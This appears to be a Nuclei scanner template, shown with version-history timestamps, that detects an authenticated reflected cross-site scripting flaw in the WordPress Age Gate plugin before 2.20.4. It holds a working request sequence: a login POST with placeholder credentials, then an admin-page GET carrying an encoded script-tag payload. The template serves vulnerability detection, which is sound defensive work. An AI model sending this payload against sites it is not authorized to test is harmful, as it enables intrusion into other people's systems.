2022-09-23 11:18:11 +00:00
id : age-gate-xss
info :
2022-09-29 13:38:41 +00:00
name : WordPress Age Gate <2.20.4 - Cross-Site Scripting
2022-09-23 11:18:11 +00:00
author : akincibor,daffainfo
2022-09-29 13:38:41 +00:00
severity : high
2022-09-23 11:18:11 +00:00
description : |
2022-09-29 13:38:41 +00:00
WordPress Age Gate plugin before 2.20.4 contains a cross-site scripting vulnerability. The plugin does not escape some URLs before outputting them back in attributes.
2022-09-23 11:18:11 +00:00
reference :
- https://wpscan.com/vulnerability/a13148fe-ffc9-4003-a44d-652624ba5535
- https://wordpress.org/plugins/age-gate/
2022-09-29 13:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-09-23 11:36:52 +00:00
tags : xss,authenticated,age-gate,wpscan,wordpress,wp-plugin,wp
2022-09-23 11:18:11 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=age-gate&a%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"><script>alert(document.domain)</script>'
- 'Age Gate Restriction Settings'
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28